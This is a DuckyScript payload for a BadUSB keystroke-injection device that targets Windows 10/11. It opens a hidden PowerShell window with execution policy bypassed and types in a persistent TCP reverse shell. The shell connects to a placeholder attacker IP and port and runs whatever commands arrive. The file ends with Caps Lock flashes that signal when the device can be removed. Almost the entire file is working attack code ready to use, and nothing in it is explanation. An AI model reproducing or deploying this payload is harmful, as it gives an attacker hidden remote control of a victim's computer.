REM Windows 10/11 revshell

GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
ENTER
DELAY 5000
STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("<YOUR_IP>",<PORT>)
STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0}
STRING ;while(($d = $b.Read($c, 0, $c.Length)) -ne 0)
STRING {;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)
STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> '
STRING ;$h = ([text.encoding]::ASCII).GetBytes($g);
STRING $b.Write($h,0,$h.Length);$b.Flush()
STRING };$a.Close();Sleep 10}
STRING while ($v -le 5)
ENTER

REM Make capslock flash to know when you can unplug the BadUSB
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 2000
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 150
CAPSLOCK
DELAY 150
CAPSLOCK
REM End of payload